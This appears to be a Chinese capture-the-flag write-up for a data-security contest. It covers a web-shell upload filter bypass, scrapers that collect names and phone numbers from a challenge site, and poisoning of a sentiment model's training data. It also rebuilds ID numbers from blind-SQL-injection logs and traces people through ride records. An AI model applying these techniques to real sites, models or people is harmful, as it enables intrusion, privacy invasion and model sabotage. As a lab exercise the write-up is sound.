数据安全
AS
import math
def solve_pell(D):
"""使用连分数法求解Pell方程的基本解"""
sqrtD = int(math.isqrt(D))
if sqrtD * sqrtD == D:
return None # D是平方数,无解
m = 0
d = 1
a = sqrtD
num1, num = 1, a
den1, den = 0, 1
while num*num - D*den*den != 1:
m = d * a - m
d = (D - m*m) // d
a = (sqrtD + m) // d
num, num1 = a * num + num1, num
den, den1 = a * den + den1, den
return (num, den)
def generate_solutions(D, base_sol, min_exponent=10):
"""通过递归快速幂生成满足条件的解"""
x1, y1 = base_sol
xn, yn = x1, y1
solutions = []
# 生成直到满足条件的解
while True:
k = xn
y = yn
n1 = (k - 1) // 2
n2 = y
# 检查是否满足条件
threshold = 1 << 0x149f # 2^5279
if n1 > threshold and n2 > threshold:
return (n1, n2)
# 更新解到下一个更大的解
xn, yn = x1 * xn + D * y1 * yn, x1 * yn + y1 * xn
if __name__ == "__main__":
D = 8 * 5279 # 42232
base_sol = solve_pell(D)
if base_sol:
x_base, y_base = base_sol
print(f"基本解: (k={x_base}, y={y_base})")
# 生成满足条件的解
n1, n2 = generate_solutions(D, base_sol)
print(f"\n满足条件的解:")
print(f"n1 = {n1}")
print(f"n2 = {n2}")
else:
print("D是平方数,无解")
ez_upload
上传文件,发现可以上传phtml,
又发现内容中不允许包含php,使用大小写绕过
写入文件马后蚁剑连接,
发现密钥就在www目录下
模型安全
数据预处理
1
用到的脚本
爬取网站脚本
import requests
from bs4 import BeautifulSoup
import time
import random
def scrape_product_reviews(product_id, file):
url = f"http://47.117.190.214:32879/index.php?controller=product&action=detail&id={product_id}"
try:
# 添加随机延迟避免被封(1-3秒)
time.sleep(random.uniform(0, 0.2))
response = requests.get(url)
response.raise_for_status()
soup = BeautifulSoup(response.text, 'html.parser')
reviews = soup.find_all('div', class_='review-item')
for review in reviews:
# 初始化字段默认值
user_id = "无"
username = "无"
phone = "无"
content = "无"
# 提取用户信息
user_info = review.find('div', class_='reviewer-info')
if user_info:
user_id_tag = user_info.find('span', class_='user-id')
if user_id_tag:
user_id = user_id_tag.text.split(':')[-1].strip()
username_tag = user_info.find('span', class_='reviewer-name')
if username_tag:
username = username_tag.text.split(':')[-1].strip()
phone_tag = user_info.find('span', class_='reviewer-phone')
if phone_tag:
phone = phone_tag.text.split(':')[-1].strip()
# 提取评论内容
content_tag = review.find('div', class_='review-content')
if content_tag:
content = content_tag.text.strip()
# 写入文件
file.write(
f"用户ID: {user_id}\n"
f"用户名: {username}\n"
f"手机号: {phone}\n"
f"评论文本: {content}\n"
f"商品ID: {product_id}\n"
f"\n{'=' * 30}\n\n" # 添加分隔线
)
except Exception as e:
print(f"爬取商品 {product_id} 时出错: {str(e)}")
# 打开文本文件
with open('product_reviews.txt', 'w', encoding='utf-8') as file:
# 写入文件头
file.write("商城用户评价数据\n")
file.write(f"生成时间: {time.strftime('%Y-%m-%d %H:%M:%S')}\n\n")
# 循环爬取1-500号商品
for product_id in range(1, 501):
print(f"正在爬取商品ID: {product_id}")
scrape_product_reviews(product_id, file)
print(f"爬取完成! 数据已保存到 product_reviews.txt")
从product_reviews.txt提取手机号姓名id并md5加密
import hashlib
def generate_md5(input_file, output_file):
with open(input_file, 'r', encoding='utf-8') as f_in, \
open(output_file, 'w', encoding='utf-8') as f_out:
current_entry = {}
for line in f_in:
line = line.strip()
# 检测分隔符
if line.startswith('=' * 30):
# 处理完整条目
if all(key in current_entry for key in ['用户ID', '用户名', '手机号']):
# 构建待加密字符串
raw_str = f"{current_entry['用户ID']}{current_entry['用户名']}{current_entry['手机号']}"
# 生成MD5
print(raw_str)
md5_hash = hashlib.md5(raw_str.encode('utf-8')).hexdigest()
# 写入格式化结果
f_out.write(f"{md5_hash}\n")
current_entry = {}
continue
# 解析字段
if ':' in line:
key, value = line.split(':', 1)
key = key.strip()
value = value.strip()
current_entry[key] = value
# 执行生成
if __name__ == "__main__":
generate_md5('product_reviews.txt', 'md5_2.txt')
print("MD5加密完成,结果已保存到 md5.txt")
从product_reviews.txt获取评论和对应的用户id
def extract_reviews(input_file, output_file):
with open(input_file, 'r', encoding='utf-8') as f_in, \
open(output_file, 'w', encoding='utf-8') as f_out:
current_entry = {}
for line in f_in:
# 去除首尾空白字符
cleaned_line = line.strip()
# 检测分隔符(匹配由30个=组成的行)
if cleaned_line == '=' * 30:
if current_entry.get('用户ID') and current_entry.get('评论文本'):
f_out.write(f"{current_entry['用户ID']}:{current_entry['评论文本']}\n")
current_entry = {}
continue
# 解析用户ID
if cleaned_line.startswith('用户ID:'):
current_entry['用户ID'] = cleaned_line.split(':', 1)[1].strip()
# 解析评论文本
if cleaned_line.startswith('评论文本:'):
current_entry['评论文本'] = cleaned_line.split(':', 1)[1].strip()
if __name__ == "__main__":
extract_reviews('product_reviews.txt', 'reviews.txt')
print("数据提取完成,结果已保存到 reviews.txt")
然后交给ai手动处理得到每个id对应的评价是否正面
最后由脚本自动获取 review2.txt md5.txt的内容生成csv
import csv
import re
def load_review_data(file_path):
"""加载评论标签数据"""
reviews = {}
with open(file_path, 'r', encoding='utf-8') as f:
for line_num, line in enumerate(f, 1):
line = line.strip()
if not line:
continue
# 使用partition确保只分割第一个冒号
user_id, sep, label = line.partition(':')
if not sep:
print(f"[警告] 第{line_num}行格式错误: {line}")
continue
user_id = user_id.strip()
label = label.strip()
# 验证标签有效性
if label not in ('0', '1'):
print(f"[警告] 第{line_num}行无效标签: {label}")
continue
reviews[user_id] = label
return reviews
def load_md5_data(file_path):
"""加载MD5签名数据"""
md5_pattern = re.compile(r'^[a-f0-9]{32}$')
signatures = {}
with open(file_path, 'r', encoding='utf-8') as f:
for line_num, line in enumerate(f, 1):
line = line.strip()
if not line:
continue
user_id, sep, md5 = line.partition(':')
if not sep:
print(f"[警告] 第{line_num}行格式错误: {line}")
continue
user_id = user_id.strip()
md5 = md5.strip().lower() # MD5统一转为小写
# 验证MD5格式
if not md5_pattern.match(md5):
print(f"[警告] 第{line_num}行无效MD5: {md5}")
continue
signatures[user_id] = md5
return signatures
def generate_csv(reviews, signatures, output_file):
"""生成最终CSV文件"""
matched = 0
missing = []
with open(output_file, 'w', encoding='utf-8', newline='') as f:
writer = csv.writer(f)
writer.writerow(['user_id', 'label', 'signature'])
for user_id, label in reviews.items():
if user_id in signatures:
writer.writerow([user_id, label, signatures[user_id]])
matched += 1
else:
missing.append(user_id)
# 输出统计信息
print(f"成功匹配记录数: {matched}")
if missing:
print(f"未找到MD5签名的用户ID数量: {len(missing)}")
print(f"示例缺失ID: {', '.join(missing[:3])}...")
if __name__ == "__main__":
# 文件路径配置
REVIEW_FILE = "review2.txt"
MD5_FILE = "md5.txt"
OUTPUT_FILE = "result.csv"
# 加载数据
print("正在加载评论数据...")
review_data = load_review_data(REVIEW_FILE)
print(f"加载到有效评论记录: {len(review_data)}条")
print("\n正在加载MD5数据...")
md5_data = load_md5_data(MD5_FILE)
print(f"加载到有效MD5记录: {len(md5_data)}条")
# 生成CSV文件
print("\n正在生成合并文件...")
generate_csv(review_data, md5_data, OUTPUT_FILE)
print(f"\n结果已保存至: {OUTPUT_FILE}")
暂时无法在飞书文档外展示此内容
2
使用脚本
通过爬虫抓取各个商品的特征值,进行数据匹配,生成表格
import requests
import csv
import re
from bs4 import BeautifulSoup
def get_category_id(product_name):
if "花卉" in product_name:
return 23
if "园艺" in product_name and "花卉" not in product_name:
return 25
# 定义关键词映射(部分关键词仅为示例)
mapping = [
(1, ["手机", "oneplus", "iphone", "oppo", "vivo", "华为"]),
(2, ["母婴"]),
(3, ["家居"]),
(4, ["书", "著作", "物种起源", "达尔文"]),
(5, ["蔬菜"]),
(6, ["厨房"]),
(7, ["办公"]),
(8, ["水果", "桑葚", "苹果", "香蕉", "橙子"]),
(9, ["宠物"]),
(10, ["运动"]),
(11, ["热水器", "恒温"]),
(12, ["彩妆"]),
(13, ["保健品"]),
(14, ["酒水"]),
(15, ["玩具"]),
(16, ["汽车"]),
(17, ["床上"]),
(18, ["洗发水", "洗护"]),
(19, ["五金"]),
(20, ["户外"]),
(21, ["珠宝"]),
(22, ["医疗"]),
(24, ["游戏"]),
]
name_lower = product_name.lower()
for cid, keywords in mapping:
for kw in keywords:
if kw.lower() in name_lower:
return cid
# 如果没有匹配到,返回 0 表示未知分类
return 0
def parse_sales(sales_str):
"""
解析销量字符串,例如"月销量: 720件",提取数字并进行数据清洗,
如果销量为负则返回0。
"""
match = re.search(r'月销量:\s*(-?\d+)', sales_str)
if match:
sales = int(match.group(1))
return sales if sales > 0 else 0
return 0
def get_review_count(product_detail_url):
"""
访问商品详情页,根据页面中评论区域(假设评论项的 class 为'review-item')统计评论数量。
若无法访问或未找到评论,则返回 0。
"""
try:
resp = requests.get(product_detail_url, timeout=5)
if resp.status_code != 200:
return 0
detail_soup = BeautifulSoup(resp.text, 'html.parser')
# 根据实际详情页的结构调整下面的查找规则
review_items = detail_soup.find_all(class_='review-item')
return len(review_items)
except Exception as e:
print(f"Error fetching reviews from {product_detail_url}: {e}")
return 0
def main():
base_url = "http://47.117.190.214:32879/index.php?controller=home&action=index&page="
products = []
page = 1
# 持续爬取页面直到获得500个商品或页面结束
while len(products) < 500:
url = base_url + str(page)
print("Scraping page:", page)
try:
resp = requests.get(url, timeout=10)
except Exception as e:
print(f"Failed to retrieve page {page}: {e}")
break
if resp.status_code != 200:
print("Failed to retrieve page:", page)
break
soup = BeautifulSoup(resp.text, 'html.parser')
product_cards = soup.find_all(class_="product-card")
if not product_cards:
print("No product cards found on page:", page)
break
for card in product_cards:
try:
product_id_text = card.find(class_="product-id").get_text(strip=True)
# 例如 "商品ID: 500"
product_id = int(re.search(r'商品ID:\s*(\d+)', product_id_text).group(1))
product_name = card.find(class_="product-name").get_text(strip=True)
sales_text = card.find(class_="product-sales").get_text(strip=True)
sales = parse_sales(sales_text)
# 获取详情页链接,用于统计评论数
product_link = card.find("a", class_="product-link")["href"]
reviews_number = get_review_count(product_link)
category_id = get_category_id(product_name)
products.append({
"product_id": product_id,
"sales": sales,
"category_id": category_id,
"reviews_number": reviews_number
})
if len(products) >= 500:
break
except Exception as e:
print(f"Error parsing product card: {e}")
continue
page += 1
# 按商品ID升序排列
products = sorted(products, key=lambda x: x["product_id"])
# 保存为 CSV 文件,确保编码为 UTF-8
output_file = "submit_2.csv"
with open(output_file, "w", newline="", encoding="utf-8") as f:
writer = csv.DictWriter(f, fieldnames=["product_id", "sales", "category_id", "reviews_number"])
writer.writeheader()
for prod in products:
writer.writerow(prod)
print(f"Finished! {len(products)} products have been saved to {output_file}")
if __name__ == "__main__":
main()
3
同样是使用第一题的爬虫脚本 然后从product_reviews.txt获取内容
获取手机号并加密保存
import re
def process_phone(phone):
"""处理手机号格式,保留前3位和后4位"""
if len(phone) != 11 or not phone.isdigit():
return None
return f"{phone[:3]}****{phone[-4:]}"
def extract_phones(input_file, output_file):
with open(input_file, 'r', encoding='utf-8') as f_in, \
open(output_file, 'w', encoding='utf-8') as f_out:
# 定义匹配模式
id_pattern = re.compile(r'用户ID:\s*(\d+)')
phone_pattern = re.compile(r'手机号:\s*(\d{11})')
current_id = None
current_phone = None
for line in f_in:
line = line.strip()
# 匹配用户ID
if id_match := id_pattern.search(line):
current_id = id_match.group(1)
# 匹配手机号
elif phone_match := phone_pattern.search(line):
raw_phone = phone_match.group(1)
if processed_phone := process_phone(raw_phone):
current_phone = processed_phone
# 遇到分隔符时写入结果
if line.startswith('========'):
if current_id and current_phone:
f_out.write(f"{current_id}:{current_phone}\n")
# 重置临时变量
current_id = None
current_phone = None
if __name__ == "__main__":
extract_phones('product_reviews.txt', 'phone.txt')
print("手机号提取完成,结果已保存到 phone.txt")
然后直接生成csv,关于user-agent检验使用手动输入
import csv
def convert_to_csv(input_file, output_file):
"""
将phone.txt转换为指定格式的CSV文件
:param input_file: 输入文件名
:param output_file: 输出文件名
"""
try:
with open(input_file, 'r', encoding='utf-8') as f_in, \
open(output_file, 'w', encoding='utf-8', newline='') as f_out:
# 创建CSV写入器
writer = csv.writer(f_out)
# 写入表头
writer.writerow(['user_id', 'desensitization'])
# 处理数据行
for line_num, line in enumerate(f_in, 1):
line = line.strip()
if not line:
continue
# 分割数据
if ':' not in line:
print(f"第{line_num}行格式错误,缺少冒号分隔符: {line}")
continue
user_id, desensitization = line.split(':', 1)
user_id = user_id.strip()
desensitization = desensitization.strip()
# 验证数据有效性
if not user_id.isdigit():
print(f"第{line_num}行包含非数字用户ID: {user_id}")
continue
if len(desensitization) != 11 or '****' not in desensitization:
print(f"第{line_num}行脱敏格式异常: {desensitization}")
continue
# 写入CSV
writer.writerow([user_id, desensitization])
except FileNotFoundError:
print(f"错误:文件 {input_file} 不存在")
except Exception as e:
print(f"处理过程中发生未知错误: {str(e)}")
if __name__ == "__main__":
# 配置参数
INPUT_FILE = "phone.txt"
OUTPUT_FILE = "phone_data.csv"
# 执行转换
convert_to_csv(INPUT_FILE, OUTPUT_FILE)
print(f"文件转换完成,结果已保存至 {OUTPUT_FILE}")
暂时无法在飞书文档外展示此内容
模型对抗投毒
1
通过对模型的和向量器的分析,找到了尽可能对两种判断结果影响大的关键词,分别为垃圾和不错,将其写入表格,对数据进行投毒,影响其结果(csv数据在最后)
2
生成不超过100条、每条不超过20字符的投毒数据。这些数据需要将正向词标记为负面标签,负向词标记为正面标签。所以,我需要确保脚本能够生成这样的数据,并且符合字符限制。
构建正反向词库。正向词库应该包含常见的积极评价词汇,比如“好”、“推荐”、“满意”等,而反向词库则包含负面词汇,如“差”、“失望”、“糟糕”。这些词汇需要足够多样化,以确保覆盖尽可能多的场景,从而提高模型中毒的效果。
生成样本的方法。每个样本应该由一个或多个关键词组成,可能加上修饰词,比如“非常”、“极其”等,来增加样本的多样性。同时,要确保每条样本的字符数不超过20。这里需要一个函数来随机组合关键词和修饰词,并检查长度是否符合要求。
定义正反向词库和修饰词。随机生成样本,组合修饰词和关键词,检查样本长度和重复性,然后分配正确的标签。(csv数据在最后)
数据分析
溯源与取证
1
R-StudioPortable打开,发现文件全部被删除,提取出所有文件
重要文件里有隐藏文字
2
内存用volatility分析,发现truecrypt加密,dump出进程里的内存,然后解密log文件进行挂载,得到两个日志文件
3
日志文件发现为布尔盲注,布尔盲注成功时响应长度为704,用awk提取出所有包含704的行, 再用
awk 'match($0, /select%20id_card%20from%20info%20limit%20([0-9]{1,3}),1\),([0-9]{1,3}),1\)\)=([0-9]{1,3})/, a) {print a[1], a[2], a[3]}' 1.txt | sort -k 1,2 -n | uniq | python 1.py
配合脚本,得到身份证号
import sys
# 初始化可动态扩展的字符串列表
str_list = []
for line in sys.stdin:
line = line.strip()
if not line: continue
try:
# 解析三个数字
str_pos, char_pos, ascii_code = map(int, line.split())
# 转换为0-based索引
list_idx = str_pos
char_idx = char_pos - 1
# ASCII解码
char = chr(ascii_code)
# 动态扩展列表
while len(str_list) <= list_idx:
str_list.append("") # 填充空字符串
# 动态扩展目标字符串
target_str = list(str_list[list_idx])
while len(target_str) <= char_idx:
target_str.append(" ") # 填充空格
# 替换字符
target_str[char_idx] = char
str_list[list_idx] = "".join(target_str)
except Exception as e:
print(f"处理错误: {line} -> {e}", file=sys.stderr)
# 输出结果
print("\n最终字符串列表:")
for idx, s in enumerate(str_list):
print(f"[字符串{idx+1}] {s}")%
[字符串1] 110101199001011234
[字符串2] 310115198502021234
[字符串3] 440305199503031234
[字符串4] 500101200012121234
[字符串5] 330106197708081234
[字符串6] 210202198609091234
[字符串7] 420103199912121234
[字符串8] 510104199311111234
[字符串9] 230107196504041234
[字符串10] 320508200005051234
[字符串11] 130104198707071234
[字符串12] 410105199206061234
[字符串13] 220203198808081234
[字符串14] 610112200109091234
[字符串15] 340104197612121234
[字符串16] 370202199404041234
[字符串17] 530102199810101234
[字符串18] 450305198303031234
[字符串19] 120105197411111234
[字符串20] 350203200202021234
[字符串21] 430104199707071234
[字符串1] WangWei
[字符串2] LiNa
[字符串3] ZhangQiang
[字符串4] ChenFang
[字符串5] LiuTao
[字符串6] ZhouMin
[字符串7] ZhaoGang
[字符串8] YangXue
[字符串9] HuangLei
[字符串10] XuLi
[字符串11] SunHao
[字符串12] ZhuLin
[字符串13] MaChao
[字符串14] HeJing
[字符串15] GaoFei
[字符串16] LinYan
[字符串17] GuoYong
[字符串18] LuoMin
[字符串19] LiangJun
[字符串20] SongJia
[字符串21] XieFang
按照首字母排列得,md5哈希后提交
500101200012121234340104197612121234530102199810101234610112200109091234230107196504041234120105197411111234310115198502021234370202199404041234330106197708081234450305198303031234220203198808081234350203200202021234130104198707071234110101199001011234430104199707071234320508200005051234510104199311111234440305199503031234420103199912121234210202198609091234410105199206061234
数据社工
1
navicat查看滴滴打车记录,得到经纬度,再通过经纬度搜索得到对应的小区名,在3处得到了公司名
2
见3
3
得到手机号以及公司名和身份证号
4
见3
5
之前得到手机号13891889377
在车的图片中寻找,全导入OCR中,从得到的结果中ctrl+F搜索,找到
数据攻防
1
pcapng流量包里导出http流,发现了盲注,手撕得到flag
2
wireshark过滤POST 到 upload的流量,发现两处流量包,经分析文件名为2.abc
3
脚本统计姓名出现次数并自动转换
import re
import json
from collections import defaultdict
def process_log(log_file, output_file):
info_dict = defaultdict(lambda: {'phone': '', 'count': 0})
with open(log_file, 'r', encoding='utf-8') as f:
content = f.read()
blocks = re.split(r'={5,}\n', content)
for block in blocks:
block = block.strip()
if not block:
continue
lines = block.split('\n')
if not lines[0].startswith('HTTP/'):
continue
try:
header_end = lines.index('')
except ValueError:
continue
body = '\n'.join(lines[header_end+1:])
try:
data = json.loads(body)
name = data.get('name', '')
phone = data.get('phone', '')
if name and phone:
if info_dict[name]['count'] == 0:
info_dict[name]['phone'] = phone
info_dict[name]['count'] = 1
else:
info_dict[name]['count'] += 1
except json.JSONDecodeError:
continue
with open(output_file, 'w', encoding='utf-8') as f:
for name in info_dict:
if info_dict[name]['count'] > 0:
line = f"{name} {info_dict[name]['phone']} {info_dict[name]['count']}\n"
f.write(line)
if __name__ == '__main__':
process_log('http.log', '1.txt')
发现重名,手动筛选获得最终答案
王二蛋,15100266408,1053;石建,18623146812,1047;李二娃,13823137848,1037;